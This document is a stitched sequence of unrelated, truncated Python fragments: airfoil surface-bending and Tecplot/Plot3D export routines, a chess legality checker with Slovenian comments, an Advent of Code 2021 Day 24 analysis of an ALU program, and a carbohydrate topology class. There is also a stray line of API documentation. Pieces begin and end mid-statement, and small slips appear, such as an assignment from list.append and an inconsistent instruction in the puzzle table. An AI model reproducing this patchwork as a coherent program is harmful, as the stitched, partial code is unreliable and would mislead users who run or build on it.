- **ResourceType** *(string) --*
The type of resource with which the tag is associated. Valid resource types are:
* | |
1.0/(1.0+np.exp(-a*x-2))
y2 = 1.0 + a/4*x
rr = x < -2/a
return rr*y1 + (1-rr)*y2
def bend(self, i_sec0: int, i_sec1: int, leader=None, kx=None, ky=None, kc=None, rot_x=False):
'''
Bend surfaces by a guide curve, i.e., leader.
>>> bend(i_sec0: int, i_sec1: int, leader=None,
>>> kx=None, ky=None, kc=None, rot_x=False)
### Inputs:
```text
i_sec0: the index of start section
i_sec1: the index of end section
leader: list of points (and chord length) in the guide curve.
[[x,y,z(,c)], [x,y,z(,c)], ...]
axis: Z-axis, spanwise direction
kx: X-axis slope (dx/dz) at both ends [kx0, kx1]
ky: Y-axis slope (dy/dz) at both ends [ky0, ky1]
kc: Chord slope (dc/dz) at both ends [kc0, kc1]
rot_x: if True, rotate sections in x-axis to
make the section vertical to the leader
```
### Note:
```text
The leader is a list of points to define the spline curve that
describes the leading edge curve.
Regenerate the surface between section i_sec0 and i_sec1
X is the flow direction (chord direction)
```
'''
if self.l2d:
print('No bending for 2D cases')
return
def sortZ(loc):
return loc[2]
#* Control points of the leader curve
leader_points = []
spline_chord = False
if not kc is None:
spline_chord = True
elif not leader is None:
if len(leader[0])==4:
spline_chord = True
if spline_chord:
for i in range(i_sec0, i_sec1+1):
leader_points.append([self.secs[i].xLE, self.secs[i].yLE, self.secs[i].zLE, self.secs[i].chord])
else:
for i in range(i_sec0, i_sec1+1):
leader_points.append([self.secs[i].xLE, self.secs[i].yLE, self.secs[i].zLE])
#* Manually provided leader points
if not leader is None:
if (spline_chord and len(leader[0])==4) or (not spline_chord and len(leader[0])==3):
# Need c and provide c // Don't need c and have no c
for point in leader:
leader_points.append(point)
elif spline_chord and len(leader[0])==3:
# Need c but have no c
for point in leader:
chord = self.linear_interpolate_z(point[2], key='chord')
point_ = point.append(chord)
leader_points.append(point)
else:
print('spline_chord', spline_chord)
print('len(leader[0])', len(leader[0]))
print('kc', kc)
raise Exception('Should not happen')
leader_points.sort(key=sortZ)
n_point = len(leader_points)
#* Generating leader curve
u = np.zeros(n_point) # independent variable list
v = np.zeros(n_point) # dependent variable list
w = np.zeros(n_point) # dependent variable list
c = np.zeros(n_point) # chord list
for i in range(n_point):
u[i] = leader_points[i][2] # z
v[i] = leader_points[i][0] # x
w[i] = leader_points[i][1] # y
if spline_chord:
c[i] = leader_points[i][3] # chord
if kx is None:
leader_x = CubicSpline(u, v)
else:
leader_x = CubicSpline(u, v, bc_type=((1,kx[0]), (1,kx[1])))
if ky is None:
leader_y = CubicSpline(u, w)
else:
leader_y = CubicSpline(u, w, bc_type=((1,ky[0]), (1,ky[1])))
if spline_chord and kc is None:
leader_c = CubicSpline(u, c)
elif not kc is None:
leader_c = CubicSpline(u, c, bc_type=((1,kc[0]), (1,kc[1])))
#* Bend surfaces
i0 = i_sec0
i1 = i_sec1
for i_surf in range(i0, i1):
sec0 = self.secs[i_surf]
sec1 = self.secs[i_surf+1]
ns = self.surfs[i_surf][0].shape[0]
for j in range(ns):
# Transition of inner sections
if i_sec0!=0 and j==0:
if i_surf==i0:
continue
if i_sec1!=self.n_sec-1 and j==ns-1:
if i_surf==i1-1:
continue
# Start bending
xx = self.surfs[i_surf][0][j,:]
yy = self.surfs[i_surf][1][j,:]
zz = self.surfs[i_surf][2][j,:]
nn = xx.shape[0]
zLE = zz[0]
xLE = leader_x(zLE)
yLE = leader_y(zLE)
# Original leading edge coordinates
tt = 1.0*j/(ns-1.0)
x0 = (1-tt)*sec0.xLE + tt*sec1.xLE
y0 = (1-tt)*sec0.yLE + tt*sec1.yLE
c0 = (1-tt)*sec0.chord + tt*sec1.chord
#* Rotation of x-axis (dy/dz)
if rot_x:
angle = -np.arctan(leader_y(zLE, 1))/np.pi*180.0
#xx, yy, zz = rotate(xx, yy, zz, angle=angle, origin=[xLE, yLE, zLE])
xx, yy, zz = rotate(xx, yy, zz, angle=angle, origin=[x0, y0, zLE])
#* Translation
if spline_chord:
xx, _, yy, _ = transform(xx, xx, yy, yy, dx=xLE-x0, dy=yLE-y0,
x0=xLE, y0=yLE, scale=leader_c(zLE)/c0)
else:
i_half = int(np.floor(nn/2.0))
if abs(xx[i_half]-x0)>1e-6 or abs(yy[i_half]-y0)>1e-6:
#* The location of curve end is fixed
# Single piece of open curve to be bent
xx, yy = stretch_fixed_point(xx, yy, dx=xLE-x0, dy=yLE-y0,
xm=x0, ym=y0, xf=xx[-1], yf=yy[-1])
else:
#* The locations of the trailing edge of upper and lower surface are fixed
# An airfoil (containing both upper and lower surfaces) to be bent
# Original leading edge: x0, xu[0], xl[-1]
# New leading edge: xLE
# Original trailing edge: xu[-1], xl[0]
xu = xx[i_half:]
xl = xx[:i_half+1]
yu = yy[i_half:]
yl = yy[:i_half+1]
xu, yu = stretch_fixed_point(xu, yu, dx=xLE-x0, dy=yLE-y0,
xm=x0, ym=y0, xf=xu[-1], yf=yu[-1])
xl, yl = stretch_fixed_point(xl, yl, dx=xLE-x0, dy=yLE-y0,
xm=x0, ym=y0, xf=xl[0], yf=yl[0])
xx = np.concatenate((xl,xu[1:]), axis=0)
yy = np.concatenate((yl,yu[1:]), axis=0)
self.surfs[i_surf][0][j,:] = xx.copy()
self.surfs[i_surf][1][j,:] = yy.copy()
self.surfs[i_surf][2][j,:] = zz.copy()
def Surf2Cylinder(self, flip=True, origin=None):
'''
Bend the surface (surfs) to cylinder (turbomachinery).
The original surface is constructed by 2D sections.
### Inputs:
```text
flip: if True, flip X
origin: default None, i.e., the cylinder origin axis is Z-axis for all sections
otherwise, provide a list of actual cylinder origins, [O0, O1, ...]
list length is the number of sections
each element is the cylinder origin of that section, i.e., [xO, yO]
can be ndarray or list
```
'''
if origin is None:
for surf in self.surfs:
ns = surf[0].shape[0]
for j in range(ns):
x, y, z = toCylinder(surf[0][j,:], surf[1][j,:], surf[2][j,:], flip=flip)
surf[0][j,:] = x.copy()
surf[1][j,:] = y.copy()
surf[2][j,:] = z.copy()
for sec in self.secs:
sec.x, sec.y, sec.z = toCylinder(sec.x, sec.y, sec.z, flip=flip)
else:
for i in range(len(self.surfs)):
surf = self.surfs[i]
ns = surf[0].shape[0]
for j in range(ns):
#! This linear interplotation of origins
#! causes non-smooth surface even when the smooth function is used
tt = j/(ns-1.0)
x0 = (1-tt)*origin[i][0] + tt*origin[i+1][0]
y0 = (1-tt)*origin[i][1] + tt*origin[i+1][1]
x, y, z = toCylinder(surf[0][j,:], surf[1][j,:], surf[2][j,:], flip=flip, origin=[x0,y0])
surf[0][j,:] = x.copy()
surf[1][j,:] = y.copy()
surf[2][j,:] = z.copy()
for i in range(self.n_sec):
sec = self.secs[i]
sec.x, sec.y, sec.z = toCylinder(sec.x, sec.y, sec.z, flip=flip, origin=origin[i])
def read_cylinder_origins(self, fname):
'''
Read in orgins of each section from file
>>> origins = read_cylinder_origins(fname)
### Inputs:
```text
fname: settings file name
```
'''
if not os.path.exists(fname):
raise Exception(fname+' does not exist for surface read setting')
key_dict = {'CylinderOrigin:': 9}
origins = []
found_surf = False
found_key = 0
with open(fname, 'r') as f:
lines = f.readlines()
iL = 0
while iL<len(lines):
line = lines[iL].split()
if len(line) < 1:
iL += 1
continue
if not found_surf and len(line) > 1:
if '[Surf]' in line[0] and self.name == line[1]:
found_surf = True
elif found_surf and '[Surf]' in line[0]:
break
elif found_surf and found_key == 0:
if line[0] in key_dict:
found_key = key_dict[line[0]]
elif found_surf and found_key == 9:
for i in range(self.n_sec):
iL += 1
line = lines[iL].split()
origins.append([float(line[0]), float(line[1])])
found_key = 0
else:
# Lines that are not relevant
pass
iL += 1
return origins
def output_tecplot(self, fname=None, one_piece=False):
'''
Output the surface to *.dat in Tecplot format
### Inputs:
```text
fname: the name of the file
one_piece: True ~ combine the spanwise sections into one piece
```
'''
# surf_x[ns,nt], ns => spanwise
if fname is None:
fname = self.name + '.dat'
n_sec = 1 if self.l2d else self.n_sec-1
n_piece = len(self.surfs)
with open(fname, 'w') as f:
f.write('Variables= X Y Z \n ')
nt = self.surfs[0][0].shape[1]
ns = self.ns
if not one_piece:
for i_sec in range(n_piece):
surf_x = self.surfs[i_sec][0]
surf_y = self.surfs[i_sec][1]
surf_z = self.surfs[i_sec][2]
f.write('zone T="sec %d" i= %d j= %d \n'%(i_sec, nt, ns))
for i in range(ns):
for j in range(nt):
f.write(' %.9f %.9f %.9f\n'%(surf_x[i,j], surf_y[i,j], surf_z[i,j]))
else:
n_point = n_sec*(self.ns-1) + 1
f.write('zone T="sec" i= %d j= %d \n'%(nt, n_point))
for i_sec in range(n_piece):
surf_x = self.surfs[i_sec][0]
surf_y = self.surfs[i_sec][1]
surf_z = self.surfs[i_sec][2]
if i_sec>=n_piece-2:
i_add = 0
else:
i_add = 1
for i in range(ns-i_add):
for j in range(nt):
f.write(' %.9f %.9f %.9f\n'%(surf_x[i,j], surf_y[i,j], surf_z[i,j]))
def output_plot3d(self, fname=None):
'''
Output the surface to *.grd in plot3d format
### Inputs:
```text
fname: the name of the file
```
'''
if fname is None:
fname = self.name + '.grd'
n_piece = len(self.surfs)
# X[ns][nn], ns => spanwise
X = self.surfs[0][0]
ns = X.shape[0]
nn = X.shape[1]
with open(fname, 'w') as f:
f.write('%d \n '%(n_piece)) # Number of surfaces
for i_sec in range(n_piece):
f.write('%d | |
figure.name == Name.Pawn:
if number_of_moved_squares == 2:
if figure.color == Color.White and curr_position[0] != 2:
return False
if figure.color == Color.Black and curr_position[0] != 7:
return False
if move[1] != 0 and not self.is_en_passant(figure, target):
if figure.color == Color.White and target not in pos_black:
return False
if figure.color == Color.Black and target not in pos_white:
return False
else:
if target in pos_black or target in pos_white:
return False
for i in range(1, number_of_moved_squares):
test_position = (curr_position[0] + i * dx, curr_position[1] + i * dy)
if test_position in pos_white or test_position in pos_black:
return False
return True
def is_castling_legal(self, king, target): # tole ni najlepša koda na svetu, ampak deluje
'''
Preverimo, ali je možno roširanje. Potrebni pogoji so:
- roširanje poteka v robni vrsti
- kralj in trdnjava se nista premaknila v celotni igri
- med trdnjavo in kraljem ni nobene druge figure
- kralj ni v šahu
- kralj se ne premakne skozi polje, v katerem bi bil v šahu
- kralj ne konča roširanja v šahu
'''
if king.name != Name.King:
return False
if king.color == Color.White:
if target[1] == 7 and self.white_short_castle:
figure = self.get_figure_by_pos((1, 8))
if figure is None or figure.name != Name.Rook or figure.color == Color.Black:
return False
if self.get_figure_by_pos((1, 6)) is not None or self.get_figure_by_pos((1, 7)) is not None:
return False
if self.is_king_in_check_now(king.color):
return False
king.position = (1, 6)
if self.is_king_in_check_now(king.color):
king.position = (1, 5)
return False
king.position = (1, 7)
if self.is_king_in_check_now(king.color):
king.position = (1, 5)
return False
king.position = (1, 5)
elif target[1] == 3 and self.white_long_castle:
figure = self.get_figure_by_pos((1, 1))
if figure is None or figure.name != Name.Rook or figure.color == Color.Black:
return False
for col in range(2, 5):
if self.get_figure_by_pos((1, col)) is not None:
return False
if self.is_king_in_check_now(king.color):
return False
king.position = (1, 4)
if self.is_king_in_check_now(king.color):
king.position = (1, 5)
return False
king.position = (1, 3)
if self.is_king_in_check_now(king.color):
king.position = (1, 5)
return False
king.position = (1, 5)
else:
return False
else:
if target[1] == 7 and self.black_short_castle:
figure = self.get_figure_by_pos((8, 8))
if figure is None or figure.name != Name.Rook or figure.color == Color.White:
return False
if self.get_figure_by_pos((8, 6)) is not None or self.get_figure_by_pos((8, 7)) is not None:
return False
if self.is_king_in_check_now(king.color):
return False
king.position = (8, 6)
if self.is_king_in_check_now(king.color):
king.position = (8, 5)
return False
king.position = (8, 7)
if self.is_king_in_check_now(king.color):
king.position = (8, 5)
return False
king.position = (8, 5)
elif target[1] == 3 and self.black_long_castle:
figure = self.get_figure_by_pos((8, 1))
if figure is None or figure.name != Name.Rook or figure.color == Color.White:
return False
for col in range(2, 5):
if self.get_figure_by_pos((8, col)) is not None:
return False
if self.is_king_in_check_now(king.color):
return False
king.position = (8, 4)
if self.is_king_in_check_now(king.color):
king.position = (8, 5)
return False
king.position = (8, 3)
if self.is_king_in_check_now(king.color):
king.position = (8, 5)
return False
king.position = (8, 5)
else:
return False
return True
def is_en_passant(self, pawn, target):
if pawn.name != Name.Pawn or pawn.color != self.current_color:
return False
return self.en_passant_position == target
def is_king_in_check_now(self, color):
king = self.get_figures_by_name(Name.King, color)[0]
for fig in list(self.in_play):
if fig.color == color:
continue
# ponavadi premik figure, kjer bi vzeli kralja, ni legalna, tu pa potrebujemo ravno to,
# zato nastavimo zastavico, ki preskoči ta pogoj v preverjanju poteze
if self.is_move_possible(fig, king.position, ignore_king=True):
return True
return False
def is_king_in_check_after(self, figure, target, *, color=None, promo_piece=None):
'''
Preverimo, ali je kralj [privzeto iste barve kot figura] v šahu po opravljenem premiku.
Po dobljenem odgovoru vrnemo stanje na začetno.
'''
if color is None:
color = figure.color
if self.is_en_passant(figure, target):
removed_piece = self.get_figure_by_pos(self.last_move.target)
else:
removed_piece = self.get_figure_by_pos(target)
if removed_piece:
self.remove_from_play(removed_piece)
starting_position = figure.position
en_passant = self.en_passant_position
castling = self.is_castling_legal(figure, target)
if castling:
if figure.color == Color.White:
row = 1
else:
row = 8
if target[1] == 7:
rook = self.get_figure_by_pos((row, 8))
rook_starting = rook.position
self.move_figure_to(rook, (row, 6))
elif target[1] == 3:
rook = self.get_figure_by_pos((row, 1))
rook_starting = rook.position
self.move_figure_to(rook, (row, 4))
self.move_figure_to(figure, target)
else:
self.move_figure_to(figure, target, promo_piece=promo_piece)
answer = self.is_king_in_check_now(color)
if promo_piece is not None:
self.undo_promotion(figure)
if removed_piece:
self.in_play.add(removed_piece)
self.captured.remove(removed_piece)
figure.position = starting_position
self.en_passant_position = en_passant
if castling:
rook.position = rook_starting
return answer
def pawn_legal_moves(self, figure):
'''
Izmed vseh možnih premikov kmeta, vrnemo vse legalne.
'''
moves = []
pos_white, pos_black = self.generate_positions()
for dx, dy in figure.possible_moves:
target = (figure.position[0] + dx, figure.position[1] + dy)
if target[0] not in range(1, 9) or target[1] not in range(1, 9):
continue
if dx in {-2, 2}:
if figure.color == Color.White and figure.position[0] != 2:
continue
if figure.color == Color.Black and figure.position[0] != 7:
continue
blockade = (figure.position[0] + dx // 2, figure.position[1])
if blockade in pos_black or blockade in pos_white:
continue
if target in pos_black or target in pos_white:
continue
elif dy != 0 and not self.is_en_passant(figure, target):
if figure.color == Color.White and target not in pos_black:
continue
if figure.color == Color.Black and target not in pos_white:
continue
else:
if target in pos_black or target in pos_white:
continue
if target[0] not in {1, 8}:
if not self.is_king_in_check_after(figure, target):
move = self.get_move(figure, target)
notation_info = self.get_notation_info(figure, target)
moves.append((move, notation_info))
else:
for promo_piece in PROMOTION_PIECES:
if not self.is_king_in_check_after(figure, target, promo_piece=promo_piece):
move = self.get_move(figure, target, promo_piece=promo_piece)
notation_info = self.get_notation_info(figure, target, promo_piece=promo_piece)
moves.append((move, notation_info))
return moves
def king_or_knight_legal_moves(self, figure):
'''
Izmed vseh možnih premikov kralja oziroma skakača, vrnemo vse legalne.
'''
moves = []
pos_white, pos_black = self.generate_positions()
for dx, dy in figure.possible_moves:
target = (figure.position[0] + dx, figure.position[1] + dy)
if target[0] not in range(1, 9) or target[1] not in range(1, 9):
continue
if figure.color == Color.White and target in pos_white:
continue
if figure.color == Color.Black and target in pos_black:
continue
if not self.is_king_in_check_after(figure, target):
move = self.get_move(figure, target)
notation_info = self.get_notation_info(figure, target)
moves.append((move, notation_info))
if figure.name == Name.King:
for dy in {-2, 2}:
target = (figure.position[0], figure.position[1] + dy)
if self.is_castling_legal(figure, target):
move = self.get_move(figure, target, castling_checked=True)
notation_info = self.get_notation_info(figure, target)
moves.append((move, notation_info))
return moves
def figure_legal_moves(self, figure):
'''
Generiramo vse legalne poteze prejete figure. Za kmeta, kralja in skakača uporabimo
pomožno funkcijo, za lovca, trdnjavo in kraljico pa iščemo vsa prazna mesta v primernih
smereh, dokler ne najdemo najdaljšega možnega premika v vsaki smeri.
'''
if figure.name == Name.Pawn:
return self.pawn_legal_moves(figure)
elif figure.name == Name.King or figure.name == Name.Knight:
return self.king_or_knight_legal_moves(figure)
else:
moves = []
pos_white, pos_black = self.generate_positions()
seen = [False] * 8
'''
5 6 7
smeri := 3 4
0 1 2
'''
if figure.name == Name.Rook:
for i in {0, 2, 5, 7}:
seen[i] = True
elif figure.name == Name.Bishop:
for i in {1, 3, 4, 6}:
seen[i] = True
for r in range(1, 8):
if all(seen):
break
for idx, (dx, dy) in enumerate(DIRECTIONS):
if seen[idx]:
continue
target = (figure.position[0] + r * dx, figure.position[1] + r * dy)
if target[0] not in range(1, 9) or target[1] not in range(1, 9):
seen[idx] = True
continue
if figure.color == Color.White:
if target in pos_white:
seen[idx] = True
continue
elif target in pos_black:
seen[idx] = True
else:
if target in pos_black:
seen[idx] = True
continue
elif target in pos_white:
seen[idx] = True
if not self.is_king_in_check_after(figure, target):
move = self.get_move(figure, target)
notation_info = self.get_notation_info(figure, target)
moves.append((move, notation_info))
return moves
def all_legal_moves(self, color):
'''
Eno po eno generiramo vse legalne poteze, ki jih lahko igralec opravi.
'''
for figure in list(self.in_play):
if figure.color != color:
continue
yield from self.figure_legal_moves(figure)
def is_mate_after(self, figure, target, *, color=None, promo_piece=None):
'''
Preverimo, ali ima igralec [privzeto nasprotnik od barve figure] kakšno legalno potezo
po premiku. Nato ponastavimo stanje na začetno.
'''
if color is None:
color = other_color(figure.color)
if self.is_en_passant(figure, target):
removed_piece = self.get_figure_by_pos(self.last_move.target)
else:
removed_piece = self.get_figure_by_pos(target)
if removed_piece:
self.remove_from_play(removed_piece)
starting_position = figure.position
en_passant = self.en_passant_position
castling = self.is_castling_legal(figure, target)
if castling:
if figure.color == Color.White:
row = 1
else:
row = 8
if target[1] == 7:
rook = self.get_figure_by_pos((row, 8))
rook_starting = rook.position
self.move_figure_to(rook, (row, 6))
elif target[1] == 3:
| |
<reponame>andypymont/adventofcode
"""
2021 Day 24
https://adventofcode.com/2021/day/24
"""
from collections import deque
from typing import List, Set, Tuple
import aocd # type: ignore
# Finding the (mostly) repeated pattern in the input program:
# 01 02 03 04 05 06 07
# inp w inp w inp w inp w inp w inp w inp w
# mul x 0 mul x 0 mul x 0 mul x 0 mul x 0 mul x 0 mul x 0
# add x z add x z add x z add x z add x z add x z add x z
# mod x 26 mod x 26 mod x 26 mod x 26 mod x 26 mod x 26 mod x 26
# div z 1 div z 1 div z 1 div z 26 div z 1 div z 26 div z 1
# add x 12 add x 10 add x 10 add x -6 add x 11 add x -12 add x 11
# eql x w eql x w eql x w eql x w eql x w eql x w eql x w
# eql x 0 eql x 0 eql x 0 eql x 0 eql x 0 eql x 0 eql x 0
# mul y 0 mul y 0 mul y 0 mul y 0 mul y 0 mul y 0 mul y 0
# add y 25 add y 25 add y 25 add y 25 add y 25 add y 25 add y 25
# mul y x mul y x mul y x mul y x mul y x mul y x mul y x
# add y 1 add y 1 add y 1 add y 1 add y 1 add y 1 add y 1
# mul z y mul z y mul z y mul z y mul z y mul z y mul z y
# mul y 0 mul y 0 mul y 0 mul y 0 mul y 0 mul y 0 mul y 0
# add y w add y w add y w add y w add y w add y w add y w
# add y 6 add y 2 add y 13 add y 8 add y 13 add y 13 add y 3
# mul y x mul y x mul y x mul y x mul y x mul y x mul y x
# add z y add z y add z y add z y add z y add z y add z y
# 08 09 10 11 12 13 14
# inp w inp w inp w inp w inp w inp w inp w
# mul x 0 mul x 0 mul x 0 mul x 0 mul x 0 mul x 0 mul x 0
# add x z add x y add x z add x z add x z add x z add x z
# mod x 26 mod x 26 mod x 26 mod x 26 mod x 26 mod x 26 mod x 26
# div z 1 div z 1 div z 26 div z 26 div z 26 div z 26 div z 26
# add x 12 add x 12 add x -2 add x -5 add x -4 add x -4 add x -12
# eql x w eql x w eql x w eql x w eql x w eql x w eql x w
# eql x 0 eql x 0 eql x 0 eql x 0 eql x 0 eql x 0 eql x 0
# mul y 0 mul y 0 mul y 0 mul y 0 mul y 0 mul y 0 mul y 0
# add y 25 add y 25 add y 25 add y 25 add y 25 add y 25 add y 25
# mul y x mul y x mul y x mul y x mul y x mul y x mul y x
# add y 1 add y 1 add y 1 add y 1 add y 1 add y 1 add y 1
# mul z y mul z y mul z y mul z y mul z y mul z y mul z y
# mul y 0 mul y 0 mul y 0 mul y 0 mul y 0 mul y 0 mul y 0
# add y w add y w add y w add y w add y w add y w add y w
# add y 11 add y 10 add y 8 add y 14 add y 6 add y 8 add y 2
# mul y x mul y x mul y x mul y x mul y x mul y x mul y x
# add z y add z y add z y add z y add z y add z y add z y
# There are two variations:
# Variation A:
# inp w
# mul x 0
# add x z
# mod x 26
# div z 1
# add x VAR1
# eql x w
# eql x 0
# mul y 0
# add y 25
# mul y x
# add y 1
# mul z y
# mul y 0
# add y w
# add y VAR2
# mul y x
# add z y
# In this variation, VAR1 is always >=10, therefore it always results in x = 1:
# mul x 0 x = 0
# add x z x = z
# mod x 26 x = x % 26
# div z 1
# add x 10 x = (x % 26) + 10
# eql x w [2-digit number] == [1-digit number] - always False, therefore x = 0
# eql x 0 x = 1
# This results in the stored 'z' value being multiplied by 26 and the new number (INP + VAR2) being
# added to it.
# Variation B:
# inp w
# mul x 0
# add x z
# mod x 26
# div z 26
# add x VAR1
# eql x w
# eql x 0
# mul y 0
# add y 25
# mul y x
# add y 1
# mul z y
# mul y 0
# add y w
# add y VAR2
# mul y x
# add z y
# In this variation, VAR1 is negative and the existing z value is divided by 26 on the 5th line.
# There are two possibilities - the value of z % 26 calculated on line 4 and then removed from the
# z-total on line 5 is either equal to -VAR1 or it is not.
# MATCHED NOT MATCHED
# inp w w = INP w = INP
# mul x 0 x = 0 x = 0
# add x z x = z x = z
# mod x 26 x = z % 26 x = z % 26
# div z 26 z //= 26 z //= 26
# add x VAR1 x = (z % 26) + VAR1 x = (z % 26) + VAR1
# eql x w x = 1 if (z % 26) + VAR1 == INP else 0 x = 1 if (z % 26) + VAR1 == INP else 0
# eql x 0 x = 0 x = 1
# mul y 0 y = 0 y = 0
# add y 25 y = 25 y = 25
# mul y x y = 0 y = 25
# add y 1 y = 1 y = 26
# mul z y z *= 1 z *= 26
# mul y 0 y = 0 y = 0
# add y w y = INP y = INP
# add y VAR2 y = INP + VAR2 y = INP + VAR2
# mul y x y = 0 y = (INP + VAR2)
# add z y z += 0 z += (INP + VAR2)
# If we want to aim for a z value of 0 at the program's conclusion, we need to avoid the VAR2 value
# being added to z, therefore we need the z % 26 value to match -VAR1. This will | |
#-*-coding:Utf-8-*-
__author__ ="<NAME>"
__version__ = "1.0.1"
__license__ = "BSD"
import json
import re,os,string
from utils import Logger,Atom
from enum import Enum
class SingletonTopo:
"""
"""
OSE_LIST = {} #dictionnaire listant les oses et les substitutions avec comme cl� leur num�ro et l'objet OseModel comme valeur ou une chaine de caract�re pour les substitutions
"""
"static" dictionary with ose model identifier as key and ose model object as value
"""
OBOND_LIST = [] #dictionnaire listant les liaison avec comme cl� un tuple : les deux oses li�s et comme valeur un tuple avec les num�ro des deux carbones de la liaison
"""
"static" list of OsidicBond objects
"""
C1FREE=[]
"""
ose identifiers without osidic binding on anomeric carbon
"""
DEFAULT_LINK=[1,4]
DEFAULT_OSETYPE={"nct":6,"ncc":5,"startc":1,"name":""}
def addOse(ose):
"""
"""
# if ose comes from if design
if ose.oseid==None:
OseModel.NUM_OSE+=1
ose.oseid=OseModel.NUM_OSE
# if ose comes from graph (loaded format)
else:
if ose.oseid>OseModel.NUM_OSE:
OseModel.NUM_OSE=ose.oseid
SingletonTopo.OSE_LIST[OseModel.NUM_OSE]=ose
SingletonTopo.C1FREE.append(ose.oseid)
def deledge(ob):
SingletonTopo.OBOND_LIST.remove(ob)
if ob.child_carbon==SingletonTopo.OSE_LIST[ob.child_ose].startcycle:
SingletonTopo.C1FREE.append(ob.child_ose)
def addEdge(osefrom,carbfrom,oseto,carbto):
"""
"""
ob=OsidicBond(osefrom,oseto,carbfrom,carbto)
SingletonTopo.OBOND_LIST.append(ob)
SingletonTopo.OSE_LIST[osefrom].bind_carb(carbfrom)
SingletonTopo.OSE_LIST[oseto].bind_carb(carbto)
if osefrom in SingletonTopo.C1FREE:
if carbfrom==SingletonTopo.OSE_LIST[osefrom].startcycle:
SingletonTopo.C1FREE.remove(osefrom)
if oseto in SingletonTopo.C1FREE:
if carbto==SingletonTopo.OSE_LIST[oseto].startcycle:
SingletonTopo.C1FREE.remove(oseto)
return ob
def get_parent(oseid):
for ob in SingletonTopo.OBOND_LIST:
if ob.child_ose==oseid:
return ob.parent_ose
return None
def get_osidicbonds(oseid1,oseid2=None):
"""
"""
result=[]
for ob in SingletonTopo.OBOND_LIST:
if ob.contains(oseid1):
if oseid2:
if ob.contains(oseid2):
result.append(ob)
else:
result.append(ob)
return result
def remove_oid(oid):
"""
"""
bonds=SingletonTopo.get_osidicbonds(oid)
om=SingletonTopo.OSE_LIST[oid]
for bond in bonds:
if oid==bond.parent_ose:
SingletonTopo.OSE_LIST[bond.child_ose].unbind_carb(bond.child_carbon)
else:
SingletonTopo.OSE_LIST[bond.parent_ose].unbind_carb(bond.parent_carbon)
SingletonTopo.OBOND_LIST.remove(bond)
del SingletonTopo.OSE_LIST[oid]
if oid in SingletonTopo.C1FREE:
SingletonTopo.C1FREE.remove(oid)
om=None
def clear():
"""
"""
SingletonTopo.OSE_LIST={}
SingletonTopo.OBOND_LIST.clear()
SingletonTopo.C1FREE.clear()
OseModel.NUM_OSE=0
OsidicBond.NUM=0
def strbondlist():
"""
"""
lsb=[]
for b in SingletonTopo.OBOND_LIST:
lsb.append(b.getAttributString())
return lsb
def get_directedbond(parent):
"""
"""
bonds=[]
for bond in SingletonTopo.OBOND_LIST:
if bond.parent_ose==parent:
bonds.append(bond)
return bonds
def topogrid():
"""
assigns row and column numbers of oses into a grid according to carbon bindings
"""
grid=SingletonTopo.__basegrid__()
conflict=[]
oids=list(SingletonTopo.OSE_LIST.keys())
for i in range(1,OseModel.NUM_OSE+1):
for j in range(i+1,OseModel.NUM_OSE+1):
if i in oids and j in oids:
if i in grid and j in grid:
coordi=grid[i]
coordj=grid[j]
if coordi==coordj:
conflict.append([i,j])
if len(conflict)>0:
for collision in conflict:
#print(("collision imgs:",collision))
group1=[]
group2=[]
oid1=collision[0]
oid2=collision[1]
ancetres1=SingletonTopo.__parseTopo__([oid1],oid1,"end")
ancetres2=SingletonTopo.__parseTopo__([oid2],oid2,"end")
shared=set(ancetres1).intersection(set(ancetres2))
if len(shared)>0:
for oid in shared:
ancetres1.remove(oid)
ancetres2.remove(oid)
group1=SingletonTopo.__parseTopo__([],ancetres1[-1:][0],"start")
group1.append(ancetres1[-1:][0])
group2=SingletonTopo.__parseTopo__([],ancetres2[-1:][0],"start")
group2.append(ancetres2[-1:][0])
#print(ancetres1[-1:][0])
#print(ancetres2[-1:][0])
coords_ancetre1=grid[ancetres1[-1:][0]]
coords_ancetre2=grid[ancetres2[-1:][0]]
if coords_ancetre1[0]>coords_ancetre2[0]:
for elt in group1:
grid[elt][0]+=1
for elt in group2:
grid[elt][0]-=1
else:
for elt in group1:
grid[elt][0]-=1
for elt in group2:
grid[elt][0]+=1
#print(grid)
return grid
def __parseTopo__(branch,om,direction,limit=None):
"""
"""
if limit==None or len(branch)<limit:
edge_next=[]
bonds=SingletonTopo.get_osidicbonds(om)
for bond in bonds:
if direction=="start" and bond.parent_ose==om:
edge_next.append(bond.child_ose)
if direction=="end" and bond.child_ose==om:
edge_next.append(bond.parent_ose)
if len(edge_next)>0:
bb=[]
for e in edge_next:
bb+=SingletonTopo.__parseTopo__(branch+[e],e,direction,limit)
return bb
else:
return branch
else:
return branch
def __basegrid__(bond=None,grid=None):
"""
"""
bonds=[]
if bond:
Logger.debug(bond.getAttributString(),0)
#print(bond.getAttributString())
if grid==None:
grid={}
start=SingletonTopo.C1FREE[0]
grid[start]=[0,0]
bonds=SingletonTopo.get_directedbond(start)
else:
row=grid[bond.parent_ose][0]
col=grid[bond.parent_ose][1]-1
if bond.parent_carbon>=5:
row-=1
elif bond.parent_carbon in [2,3]:
row+=1
if bond.parent_carbon == 2:
col+=1
grid[bond.child_ose]=[row,col]
bonds=SingletonTopo.get_directedbond(bond.child_ose)
if len(bonds)>0:
for b in bonds:
SingletonTopo.__basegrid__(b,grid)
return grid
class OseModel:
"""
"""
NUM_OSE = 0
"""
numbering of ose instances (unique identifier)
"""
def __init__(self,ncc=None,nct=None,startc=None):
self.oseid=None
self.name=""
if startc:
self.startcycle=startc
else:
self.startcycle=SingletonTopo.DEFAULT_OSETYPE["startc"]
if ncc:
self.ncc=ncc
else:
self.ncc=SingletonTopo.DEFAULT_OSETYPE["ncc"]
if nct:
self.nct=nct
else:
self.nct=SingletonTopo.DEFAULT_OSETYPE["nct"]
self.modifs=[]
iso=[]
mods=[]
#init carbon description table
for icarb in range(self.nct):
iso.append("")
if icarb==self.ncc-1:
mods.append(-1)
else:
mods.append(SubstitutionLibrary.NOSUBID)
self.modifs.append(iso)
self.modifs.append(mods)
self.anhydro=False
def setname(self,name):
self.name=name
def in_cycle(self,cnum):
"""
"""
return cnum in range(self.startcycle,self.ncc+self.startcycle)
def bind_carb(self,cnum):
"""
"""
self.modifs[1][cnum-1]=-1
def unbind_carb(self,cnum):
"""
"""
self.modifs[1][cnum-1]=SubstitutionLibrary.NOSUBID
def set_modcarb(self,cnum,subid):
"""
"""
self.modifs[1][cnum-1]=subid
def get_modcarb(self,cnum):
"""
"""
return self.modifs[1][cnum-1]
def get_carbmod(self,idsub):
carbs=[]
for icarb in range(len(self.modifs[1])):
if self.modifs[1][icarb]==idsub:
carbs.append(icarb+1)
return carbs
